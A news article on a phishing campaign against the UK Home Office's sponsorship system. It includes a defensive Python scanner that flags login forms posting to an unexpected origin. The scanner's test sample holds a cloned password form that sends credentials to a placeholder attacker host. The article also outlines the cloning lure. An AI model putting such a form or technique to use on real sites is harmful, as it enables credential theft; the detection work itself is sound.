- Mimecast discovers a phishing campaign targeting the UK Home Office
- Accounts are stolen through phishing emails and fake websites
- The fake sites are almost indistinguishable from the real ones
Mimecast researchers have discovered a phishing campaign targeting the Home Office's Sponsorship Management System (SMS).
The campaign's main objective appears to be compromising account access, which can then be sold on the dark web, used to extort organisations through the exfiltration of sensitive data, and used to create fraudulent Certificates of Sponsorship (CoS).
The campaign does not only affect organisations holding sponsor licence privileges; it threatens to undermine the entire UK immigration system.
UK Home Office at risk
The attackers begin the campaign by sending emails that closely mimic legitimate Home Office emails, using the same branding and styling. The emails contain an urgent call to action, threatening account suspension if the user does not log in.
Victims are directed to a fake login page via a CAPTCHA-gated URL that closely resembles the legitimate Home Office URL. After completing the CAPTCHA, the user lands on a cloned Home Office login page.
The only difference between the legitimate and fraudulent pages is the form's submission target. The fake page sends the entered credentials to an attacker-controlled script, where they can be collected and used to log in to the victim's account.
With the stolen accounts, attackers can then create fake job offers and visa sponsorship schemes and charge victims tens of thousands of pounds to access them.
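Because the cloned page differs from the real one only in where its login form submits, a defender can flag such clones by checking the form's resolved action against the expected origin. The following scanner is an added example, not Mimecast's or the Home Office's code; the hostnames it uses are constructed placeholders.

```python
"""Flag login pages whose credential form posts to an unexpected origin."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Collect the action URL of every <form> and whether it has a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, page_url, expected_host):
    """Return resolved action URLs of password forms not posting to expected_host."""
    parser = _FormCollector()
    parser.feed(html)
    hits = []
    for form in parser.forms:
        if not form["password"]:
            continue  # only forms that collect a password matter here
        target = urljoin(page_url, form["action"])  # empty/relative action => same site
        host = urlsplit(target).hostname or ""
        if host != expected_host and not host.endswith("." + expected_host):
            hits.append(target)
    return hits


# Constructed samples (placeholder hosts): a legitimate page and a clone
# that is identical except for the form action.
EXPECTED_HOST = "sms.home-office.example"
PAGE_URL = f"https://{EXPECTED_HOST}/login"
LEGIT_HTML = '<form method="post" action="/login"><input name="u"><input type="password" name="p"></form>'
CLONE_HTML = '<form method="post" action="https://collector.attacker.example/s.php"><input name="u"><input type="password" name="p"></form>'

if __name__ == "__main__":
    print(suspicious_forms(LEGIT_HTML, PAGE_URL, EXPECTED_HOST))  # []
    print(suspicious_forms(CLONE_HTML, PAGE_URL, EXPECTED_HOST))  # ['https://collector.attacker.example/s.php']
```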
The best protection against phishing campaigns like this is constant vigilance. Always check URLs and be wary of urgent calls to action.
A full list of indicators for this phishing campaign is available on the Mimecast blog.